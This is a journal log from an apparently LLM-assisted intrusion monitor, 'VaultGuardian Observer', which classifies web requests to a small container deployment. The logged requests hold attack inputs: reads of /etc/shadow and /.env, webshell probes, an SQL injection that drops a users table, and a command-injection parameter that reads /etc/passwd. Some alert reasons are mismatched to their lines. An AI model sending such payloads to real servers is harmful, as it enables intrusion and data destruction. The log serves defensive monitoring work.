Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.746271 [watcher] Streaming logs for srv-captain--media.1.td1ofal2g3beoqwzjiemvmuo4 (91c0395873e8)
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.746362 [watcher] Streaming logs for captain-netdata-container (974270844dff)
Mar 19 23:59:01 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:01.122464 [observer] LLM inference server connected
Mar 19 23:59:19 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:19.531838 [ALERT] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Shadow password file access Line=2026-03-19T23:59:19.530979573Z 10.0.1.9 - - [19/Mar/2026:23:59:19 +0000] "GET /etc/shadow HTTP/1.0" 404 6603 "-" "curl/8.5.0" "98.152.173.124"
Mar 19 23:59:30 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:30.751153 [observer] Pipeline: processed=5 pattern_hits=3 llm_calls=2 llm_errors=0 learned=0
Mar 19 23:59:30 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:30.751203 [observer] Patterns: hash=2 prefix=0 regex=0 contains=1 deny=1 alert=0 suppress=0 misses=2
Mar 19 23:59:44 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:44.166698 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 19 23:59:44 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:44.166751 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request attempts to access a sensitive file (/etc/shadow) from an external IP; indicative of probing or path traversal attempt. Line=2026-03-19T23:59:19.531808627Z 98.152.173.124 - - [19/Mar/2026:23:59:19 +0000] "api.admin.kovicloud.com" "GET /etc/shadow HTTP/2.0" 404 6603 "-" "curl/8.5.0" "-"
Mar 19 23:59:49 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:49.034104 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=malicious confidence=0.85 action=deny pattern_type=
Mar 19 23:59:49 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:49.034141 [ALERT] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP request contains an SQL injection payload in the URL (id=1;DROP+TABLE+users). This is a known attack pattern. Line=2026-03-19T23:59:20.349931496Z 10.0.1.9 - - [19/Mar/2026:23:59:20 +0000] "GET /?id=1;DROP+TABLE+users HTTP/1.0" 200 34020 "-" "curl/8.5.0" "98.152.173.124"
Mar 20 00:00:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:00.752005 [observer] Pipeline: processed=7 pattern_hits=3 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:00:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:00.752031 [observer] Patterns: hash=2 prefix=0 regex=0 contains=1 deny=1 alert=0 suppress=0 misses=4
Mar 20 00:00:01 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:01.551564 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.85 action=deny pattern_type=
Mar 20 00:00:01 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:01.551603 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=SQL injection attempt detected in the query string (DROP TABLE) from client IP. Line=2026-03-19T23:59:20.349657379Z 98.152.173.124 - - [19/Mar/2026:23:59:20 +0000] "api.admin.kovicloud.com" "GET /?id=1;DROP+TABLE+users HTTP/2.0" 200 34020 "-" "curl/8.5.0" "-"
Mar 20 00:00:13 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:13.924722 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 00:00:13 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:13.924759 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Request to wp-admin/install.php on a non-WordPress service with curl user agent and a 404, indicating probing or automated scanning. Line=2026-03-19T23:59:20.549961941Z 10.0.1.9 - - [19/Mar/2026:23:59:20 +0000] "GET /wp-admin/install.php HTTP/1.0" 404 146 "-" "curl/8.5.0" "98.152.173.124"
Mar 20 00:00:14 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:14.721674 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 00:00:14 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:14.721706 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-19T23:59:20.549961939Z 98.152.173.124 - - [19/Mar/2026:23:59:20 +0000] "api.admin.kovicloud.com" "GET /wp-admin/install.php HTTP/2.0" 404 146 "-" "curl/8.5.0" "-"
Mar 20 00:00:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:30.757320 [observer] Pipeline: processed=10 pattern_hits=3 llm_calls=7 llm_errors=0 learned=0
Mar 20 00:00:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:30.757345 [observer] Patterns: hash=2 prefix=0 regex=0 contains=1 deny=1 alert=0 suppress=0 misses=7
Mar 20 00:00:31 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:31.469810 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.66 action=alert pattern_type=
Mar 20 00:00:31 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:31.469844 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to fetch the /.env file from a remote IP using curl; HTTP 403 indicates blocked, but attempting to access sensitive env file is a common reconnaissance or misconfiguration probe. Line=2026-03-19T23:59:20.698091628Z 98.152.173.124 - - [19/Mar/2026:23:59:20 +0000] "api.admin.kovicloud.com" "GET /.env HTTP/2.0" 403 146 "-" "curl/8.5.0" "-"
Mar 20 00:00:31 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:31.469906 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-19T23:59:21.061755934Z 98.152.173.124 - - [19/Mar/2026:23:59:21 +0000] "api.admin.kovicloud.com" "GET /shell.php HTTP/2.0" 404 146 "-" "curl/8.5.0" "-"
Mar 20 00:00:31 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:31.469930 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=SQL injection attempt detected in the query string (DROP TABLE) from client IP. Line=2026-03-19T23:59:22.200147204Z 98.152.173.124 - - [19/Mar/2026:23:59:22 +0000] "api.admin.kovicloud.com" "GET /?cmd=cat+/etc/passwd HTTP/2.0" 200 34020 "-" "curl/8.5.0" "-"
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:38.484865 [llm] Empty content from LLM. Raw response (first 500 bytes): {
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:   "id": "chatcmpl-DLHZeBFQsfAcDLfGML7vqcQ092BfN",
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:   "object": "chat.completion",
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:   "created": 1773964814,
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:   "model": "gpt-5-nano-2025-08-07",
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:   "choices": [
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:     {
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:       "index": 0,
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:       "message": {
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:         "role": "assistant",
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:         "content": "",
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:         "refusal": null,
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:         "annotations": []
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:       },
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:       "finish_reason": "length"
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:     }
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:   ],
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:   "usage": {
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:     "prompt_tokens": 1438,
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:     "completion_tokens": 4096,
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:     "total_tokens": 5534,
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:     "prompt_tokens_details": {
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]:       "cached_t...
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:38.484919 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: LLM returned empty content
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:38.484951 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:59:20.697975977Z 10.0.1.9 - - [19/Mar/2026:23:59:20 +0000] "GET /.env HTTP/1.0" 403 14...
Mar 20 00:00:53 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:53.468424 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.78 action=alert pattern_type=
Mar 20 00:00:53 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:53.468468 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Request attempts to access a sensitive environment file (.env) from a client; typical probing activity. Line=2026-03-19T23:59:20.698069984Z 2026/03/19 23:59:20 [error] 10#10: *4733 access forbidden by rule, client: 10.0.1.9, server: _, request: "GET /.env HTTP/1.0", host: "api.admin.kovicloud.com"
Mar 20 00:01:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:01:00.742075 [observer] Pipeline: processed=24 pattern_hits=15 llm_calls=9 llm_errors=1 learned=0
Mar 20 00:01:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:01:00.742098 [observer] Patterns: hash=14 prefix=0 regex=0 contains=1 deny=2 alert=1 suppress=0 misses=9
Mar 20 00:01:09 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:01:09.043776 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.75 action=alert pattern_type=
Mar 20 00:01:09 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:01:09.043810 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Request for /shell.php with 404 and curl user-agent indicates probing for webshells. Line=2026-03-19T23:59:21.061676078Z 10.0.1.9 - - [19/Mar/2026:23:59:21 +0000] "GET /shell.php HTTP/1.0" 404 146 "-" "curl/8.5.0" "98.152.173.124"
Mar 20 00:01:09 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:01:09.043921 [ALERT] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Password file access Line=2026-03-19T23:59:22.200816911Z 10.0.1.9 - - [19/Mar/2026:23:59:22 +0000] "GET /?cmd=cat+/etc/passwd HTTP/1.0" 200 34020 "-" "curl/8.5.0" "98.152.173.124"
Mar 20 00:01:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:01:30.751562 [observer] Pipeline: processed=27 pattern_hits=18 llm_calls=9 llm_errors=1 learned=0
Mar 20 00:01:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:01:30.751588 [observer] Patterns: hash=16 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=9
Mar 20 00:02:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:02:00.741576 [observer] Pipeline: processed=33 pattern_hits=24 llm_calls=9 llm_errors=1 learned=0
Mar 20 00:02:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:02:00.741599 [observer] Patterns: hash=22 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=9
Mar 20 00:02:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:02:30.743040 [observer] Pipeline: processed=35 pattern_hits=26 llm_calls=9 llm_errors=1 learned=0
Mar 20 00:02:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:02:30.743063 [observer] Patterns: hash=24 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=9
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:02:51.175628 [llm] Empty content from LLM. Raw response (first 500 bytes): {
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:   "id": "chatcmpl-DLHbtaPl7G4nx0Rt9j2nWVYduXN6k",
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:   "object": "chat.completion",
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:   "created": 1773964953,
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:   "model": "gpt-5-nano-2025-08-07",
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:   "choices": [
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:     {
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:       "index": 0,
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:       "message": {
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:         "role": "assistant",
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:         "content": "",
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:         "refusal": null,
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:         "annotations": []
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:       },
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:       "finish_reason": "length"
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:     }
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:   ],
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:   "usage": {
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:     "prompt_tokens": 1474,
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:     "completion_tokens": 4096,
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:     "total_tokens": 5570,
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:     "prompt_tokens_details": {
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]:       "cached_t...
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:02:51.175665 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: LLM returned empty content
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:02:51.175676 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-20T00:02:33.105622241Z 43.154.127.188 - - [20/Mar/2026:00:02:33 +0000] "54.200.221.0" "GET /...
Mar 20 00:03:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:03:00.748604 [observer] Pipeline: processed=38 pattern_hits=28 llm_calls=10 llm_errors=2 learned=0
Mar 20 00:03:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:03:00.748629 [observer] Patterns: hash=26 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=10
Mar 20 00:03:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:03:30.743790 [observer] Pipeline: processed=42 pattern_hits=32 llm_calls=10 llm_errors=2 learned=0
Mar 20 00:03:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:03:30.743814 [observer] Patterns: hash=30 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=10
Mar 20 00:04:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:04:00.742216 [observer] Pipeline: processed=44 pattern_hits=34 llm_calls=10 llm_errors=2 learned=0
Mar 20 00:04:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:04:00.742240 [observer] Patterns: hash=32 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=10
Mar 20 00:04:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:04:30.743006 [observer] Pipeline: processed=48 pattern_hits=38 llm_calls=10 llm_errors=2 learned=0
Mar 20 00:04:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:04:30.743038 [observer] Patterns: hash=36 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=10
Mar 20 00:05:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:05:00.753501 [observer] Pipeline: processed=50 pattern_hits=40 llm_calls=10 llm_errors=2 learned=0
Mar 20 00:05:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:05:00.753526 [observer] Patterns: hash=38 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=10
Mar 20 00:05:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:05:30.741621 [observer] Pipeline: processed=53 pattern_hits=42 llm_calls=11 llm_errors=2 learned=0
Mar 20 00:05:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:05:30.741657 [observer] Patterns: hash=40 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=11
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:05:51.498055 [llm] Empty content from LLM. Raw response (first 500 bytes): {
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:   "id": "chatcmpl-DLHehM7mgYTVwtCtjXH4fXyHVBx5g",
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:   "object": "chat.completion",
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:   "created": 1773965127,
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:   "model": "gpt-5-nano-2025-08-07",
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:   "choices": [
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:     {
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:       "index": 0,
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:       "message": {
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:         "role": "assistant",
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:         "content": "",
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:         "refusal": null,
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:         "annotations": []
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:       },
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:       "finish_reason": "length"
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:     }
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:   ],
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:   "usage": {
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:     "prompt_tokens": 1438,
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:     "completion_tokens": 4096,
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:     "total_tokens": 5534,
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:     "prompt_tokens_details": {
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]:       "cached_t...
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:05:51.498094 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: LLM returned empty content
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:05:51.498105 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-20T00:05:27.201089137Z 93.174.93.12 - - [20/Mar/2026:00:05:27 +0000] "_" "GET / HTTP/1.0" 20...
Mar 20 00:06:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:06:00.751043 [observer] Pipeline: processed=57 pattern_hits=46 llm_calls=11 llm_errors=3 learned=0
Mar 20 00:06:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:06:00.751070 [observer] Patterns: hash=44 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=11
Mar 20 00:06:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:06:30.742006 [observer] Pipeline: processed=59 pattern_hits=48 llm_calls=11 llm_errors=3 learned=0
Mar 20 00:06:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:06:30.742030 [observer] Patterns: hash=46 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=11
Mar 20 00:07:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:07:00.742517 [observer] Pipeline: processed=65 pattern_hits=54 llm_calls=11 llm_errors=3 learned=0
Mar 20 00:07:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:07:00.742546 [observer] Patterns: hash=52 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=11
Mar 20 00:07:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:07:30.749812 [observer] Pipeline: processed=67 pattern_hits=56 llm_calls=11 llm_errors=3 learned=0
Mar 20 00:07:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:07:30.749838 [observer] Patterns: hash=54 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=11
Mar 20 00:08:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:08:00.741620 [observer] Pipeline: processed=71 pattern_hits=60 llm_calls=11 llm_errors=3 learned=0
Mar 20 00:08:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:08:00.741645 [observer] Patterns: hash=58 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=11
Mar 20 00:08:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:08:30.743139 [observer] Pipeline: processed=73 pattern_hits=62 llm_calls=11 llm_errors=3 learned=0
Mar 20 00:08:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:08:30.743186 [observer] Patterns: hash=60 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=11
Mar 20 00:09:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:09:00.742415 [observer] Pipeline: processed=76 pattern_hits=64 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:09:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:09:00.742435 [observer] Patterns: hash=62 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=12
Mar 20 00:09:08 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:09:08.129993 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 00:09:08 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:09:08.130504 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Nginx error shows a GET to /developmentserver/metadatauploader with a missing file; could indicate probing for a metadata uploader endpoint. Line=2026-03-20T00:08:49.921062577Z 2026/03/20 00:08:49 [error] 422#422: *742694 open() "/usr/share/nginx/default/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.127.2...
Mar 20 00:09:08 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:09:08.130588 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T00:08:49.921217965Z 20.127.224.63 - - [20/Mar/2026:00:08:49 +0000] "54.200.221.0" "GET /developmentserver/metadatauploader HTTP/1.1" 404 2401 "-" "Mozilla/5.0 zgrab/0.x" "-"
Mar 20 00:09:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:09:30.748202 [observer] Pipeline: processed=81 pattern_hits=69 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:09:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:09:30.748226 [observer] Patterns: hash=67 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:10:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:10:00.749694 [observer] Pipeline: processed=83 pattern_hits=71 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:10:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:10:00.749723 [observer] Patterns: hash=69 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:10:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:10:30.741805 [observer] Pipeline: processed=87 pattern_hits=75 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:10:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:10:30.741828 [observer] Patterns: hash=73 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:11:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:11:00.751671 [observer] Pipeline: processed=89 pattern_hits=77 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:11:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:11:00.751696 [observer] Patterns: hash=75 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:11:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:11:30.741708 [observer] Pipeline: processed=93 pattern_hits=81 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:11:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:11:30.741733 [observer] Patterns: hash=79 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:12:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:12:00.743179 [observer] Pipeline: processed=97 pattern_hits=85 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:12:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:12:00.743204 [observer] Patterns: hash=83 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:12:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:12:30.742304 [observer] Pipeline: processed=101 pattern_hits=89 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:12:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:12:30.742328 [observer] Patterns: hash=87 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:13:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:13:00.749660 [observer] Pipeline: processed=103 pattern_hits=91 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:13:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:13:00.749688 [observer] Patterns: hash=89 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:13:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:13:30.751243 [observer] Pipeline: processed=105 pattern_hits=93 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:13:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:13:30.751265 [observer] Patterns: hash=91 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:14:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:14:00.743343 [observer] Pipeline: processed=109 pattern_hits=97 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:14:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:14:00.743365 [observer] Patterns: hash=95 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:14:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:14:30.756462 [observer] Pipeline: processed=111 pattern_hits=99 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:14:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:14:30.756488 [observer] Patterns: hash=97 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:14:31 ip-172-26-12-110 systemd[1]: Stopping VaultGuardian Observer...
Mar 20 00:14:31 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:14:31.901430 [observer] Shutting down...
Mar 20 00:14:31 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:14:31.905850 [observer] Final stats: processed=111 pattern_hits=99 llm_calls=12 learned=0
Mar 20 00:14:31 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:14:31.905867 [observer] Shutdown complete
Mar 20 00:14:31 ip-172-26-12-110 systemd[1]: observer.service: Deactivated successfully.
Mar 20 00:14:31 ip-172-26-12-110 systemd[1]: Stopped VaultGuardian Observer.
Mar 20 00:14:31 ip-172-26-12-110 systemd[1]: Started VaultGuardian Observer.
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.921097 [observer] VaultGuardian Observer starting...
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.921181 [observer] Normalizer registry initialized
